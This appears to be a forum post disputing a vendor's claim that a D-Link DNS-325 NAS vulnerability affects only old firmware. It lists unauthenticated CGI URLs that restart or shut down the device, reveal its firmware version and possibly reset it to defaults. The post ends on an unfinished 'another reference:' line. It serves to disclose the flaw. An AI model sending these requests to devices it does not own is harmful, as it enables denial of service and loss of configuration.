The security issue you are referencing speaks specifically to DNS-325, firmware version 1.01.1217.2010. The current DNS-325 firmware version is v1.03.
i've checked on my DNS-325 with firmware v1.03 (1.03.0613.2012)
Restart the device: http://<device IP address>/cgi-bin/system_mgr.cgi?cmd=cgi_restart
Shutdown the device: http://<device IP address>/cgi-bin/system_mgr.cgi?cmd=cgi_shutdown
Retrieve the device firmware version: http://<device IP address>/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml
At least these cgi scripts are executed without any authentication!
I think, that "reset the firmware to default settings" link (http://<device IP address>/cgi-bin/wizard_mgr.cgi?cmd=cgi_wizard) is also working.
another reference: